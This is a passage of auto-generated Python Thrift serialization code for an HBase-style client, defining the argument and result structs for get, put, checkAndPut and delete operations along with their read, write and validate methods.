if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.get = TGet()
self.get.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.get is not None:
oprot.writeFieldBegin('get', TType.STRUCT, 2)
self.get.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.get is None:
raise TProtocol.TProtocolException(message='Required field get is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_args:
"""
Attributes:
- table: the table to get from
- get: the TGet to fetch
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
)
def __init__(self, table=None, get=None,):
self.table = table
self.get = get
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.get = TGet()
self.get.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.get is not None:
oprot.writeFieldBegin('get', TType.STRUCT, 2)
self.get.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.get is None:
raise TProtocol.TProtocolException(message='Required field get is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TResult()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getMultiple_args:
"""
Attributes:
- table: the table to get from
- gets: a list of TGets to fetch; the Result list
will have the Results at corresponding positions
or null if there was an error
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'gets', (TType.STRUCT,(TGet, TGet.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, gets=None,):
self.table = table
self.gets = gets
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.gets = []
(_etype45, _size42) = iprot.readListBegin()
for _i46 in xrange(_size42):
_elem47 = TGet()
_elem47.read(iprot)
self.gets.append(_elem47)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.gets is not None:
oprot.writeFieldBegin('gets', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.gets))
for iter48 in self.gets:
iter48.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.gets is None:
raise TProtocol.TProtocolException(message='Required field gets is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getMultiple_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype52, _size49) = iprot.readListBegin()
for _i53 in xrange(_size49):
_elem54 = TResult()
_elem54.read(iprot)
self.success.append(_elem54)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getMultiple_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter55 in self.success:
iter55.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class put_args:
"""
Attributes:
- table: the table to put data in
- put: the TPut to put
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 2
)
def __init__(self, table=None, put=None,):
self.table = table
self.put = put
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.put = TPut()
self.put.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('put_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.put is not None:
oprot.writeFieldBegin('put', TType.STRUCT, 2)
self.put.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.put is None:
raise TProtocol.TProtocolException(message='Required field put is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class put_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('put_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndPut_args:
"""
Attributes:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value; if not provided, the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRING, 'row', None, None, ), # 2
(3, TType.STRING, 'family', None, None, ), # 3
(4, TType.STRING, 'qualifier', None, None, ), # 4
(5, TType.STRING, 'value', None, None, ), # 5
(6, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 6
)
def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, put=None,):
self.table = table
self.row = row
self.family = family
self.qualifier = qualifier
self.value = value
self.put = put
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.family = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.qualifier = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.put = TPut()
self.put.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndPut_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.row is not None:
oprot.writeFieldBegin('row', TType.STRING, 2)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.family is not None:
oprot.writeFieldBegin('family', TType.STRING, 3)
oprot.writeString(self.family)
oprot.writeFieldEnd()
if self.qualifier is not None:
oprot.writeFieldBegin('qualifier', TType.STRING, 4)
oprot.writeString(self.qualifier)
oprot.writeFieldEnd()
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 5)
oprot.writeString(self.value)
oprot.writeFieldEnd()
if self.put is not None:
oprot.writeFieldBegin('put', TType.STRUCT, 6)
self.put.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.row is None:
raise TProtocol.TProtocolException(message='Required field row is unset!')
if self.family is None:
raise TProtocol.TProtocolException(message='Required field family is unset!')
if self.qualifier is None:
raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
if self.put is None:
raise TProtocol.TProtocolException(message='Required field put is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndPut_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndPut_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class putMultiple_args:
"""
Attributes:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'puts', (TType.STRUCT,(TPut, TPut.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, puts=None,):
self.table = table
self.puts = puts
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.puts = []
(_etype59, _size56) = iprot.readListBegin()
for _i60 in xrange(_size56):
_elem61 = TPut()
_elem61.read(iprot)
self.puts.append(_elem61)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('putMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.puts is not None:
oprot.writeFieldBegin('puts', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.puts))
for iter62 in self.puts:
iter62.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.puts is None:
raise TProtocol.TProtocolException(message='Required field puts is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class putMultiple_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('putMultiple_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteSingle_args:
"""
Attributes:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 2
)
def __init__(self, table=None, deleteSingle=None,):
self.table = table
self.deleteSingle = deleteSingle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.deleteSingle = TDelete()
self.deleteSingle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteSingle_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.deleteSingle is not None:
oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 2)
self.deleteSingle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.deleteSingle is None:
raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteSingle_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteSingle_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteMultiple_args:
"""
Attributes:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'deletes', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, deletes=None,):
self.table = table
self.deletes = deletes
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.deletes = []
(_etype66, _size63) = iprot.readListBegin()
for _i67 in xrange(_size63):
_elem68 = TDelete()
_elem68.read(iprot)
self.deletes.append(_elem68)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.deletes is not None:
oprot.writeFieldBegin('deletes', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.deletes))
for iter69 in self.deletes:
iter69.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.deletes is None:
raise TProtocol.TProtocolException(message='Required field deletes is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteMultiple_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
